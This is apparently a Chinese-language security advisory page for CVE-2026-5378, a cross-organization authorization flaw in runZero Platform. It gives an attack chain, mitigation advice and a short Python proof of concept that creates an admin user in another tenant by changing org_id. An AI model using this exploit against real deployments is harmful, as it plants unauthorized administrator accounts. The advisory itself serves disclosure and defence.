IPBUF安全漏洞报告
English
CVE-2026-5378 CVSS 5.8 中危

CVE-2026-5378 runZero平台越权创建用户漏洞

披露日期: 2026-04-07
来源: 44488dab-36db-4358-99f9-bc116477f914

漏洞信息

漏洞编号
CVE-2026-5378
漏洞类型
越权访问
CVSS评分
5.8 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
runZero Platform

相关标签

越权访问runZeroCWE-863权限绕过

漏洞概述

runZero Platform存在授权不当漏洞(CWE-863),由于后端缺乏严格的权限边界校验,允许高权限管理员在授权的组织范围之外创建和更新用户账户。该漏洞破坏了系统的完整性,攻击者利用此缺陷可绕过多租户架构限制,在全局范围内执行未授权的用户管理操作。

技术细节

该漏洞源于runZero Platform在处理用户创建和更新请求时,未能正确验证当前操作管理员的权限边界。尽管利用此漏洞需要具备管理员级别的高权限(PR:H),但系统逻辑并未将其操作严格限制在所属组织内。攻击者可以通过拦截并构造特定的HTTP请求,在API调用中恶意指定不属于本组织的组织ID或相关参数,从而在全局范围内创建或修改用户信息。这属于典型的横向越权漏洞(IDOR),利用了业务逻辑层面的缺陷,导致多租户环境下的数据隔离机制失效,成功利用后可在非授权组织下植入账户或篡改权限。

攻击链分析

STEP 1
1. 获取凭证
攻击者获取目标runZero平台中某个组织的管理员账户凭证,满足高权限(PR:H)要求。
STEP 2
2. 构造恶意请求
攻击者分析API接口,构造创建或更新用户的HTTP请求,并在请求体中将目标组织ID(org_id)修改为非其授权范围内的组织ID。
STEP 3
3. 发送越权请求
攻击者向服务器发送该恶意请求,由于存在授权逻辑缺陷,服务器未校验管理员是否有权操作该目标组织。
STEP 4
4. 执行未授权操作
服务器处理请求,在非授权的组织下成功创建或更新了用户信息,导致完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: runZero Platform Incorrect Authorization PoC # CVE: CVE-2026-5378 # Description: Create a user outside the authorized organization scope. target_url = "https://<runzero-host>/api/v1.0/users" admin_token = "<ADMIN_ACCESS_TOKEN>" # Headers with authentication headers = { "Authorization": f"Bearer {admin_token}", "Content-Type": "application/json" } # Payload attempting to create a user in a different organization (org_id) # The attacker's admin account belongs to Org A, but specifies Org B here. payload = { "name": "attacker_user", "email": "[email protected]", "role": "admin", "org_id": "<TARGET_ORG_ID_OUTSIDE_SCOPE>" # Vulnerable parameter } response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 201: print("[+] Exploit successful! User created outside authorized scope.") print(f"[+] Response: {response.text}") else: print("[-] Exploit failed or patch applied.") print(f"[-] Status Code: {response.status_code}")

影响范围

runZero Platform < 4.0.260203.0

防御指南

临时缓解措施
如果暂时无法升级,建议管理员严格监控用户管理日志,查找是否有来自非本组织管理员账户的异常用户创建或修改行为,并暂时停用不必要的管理员权限,直到完成修复。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表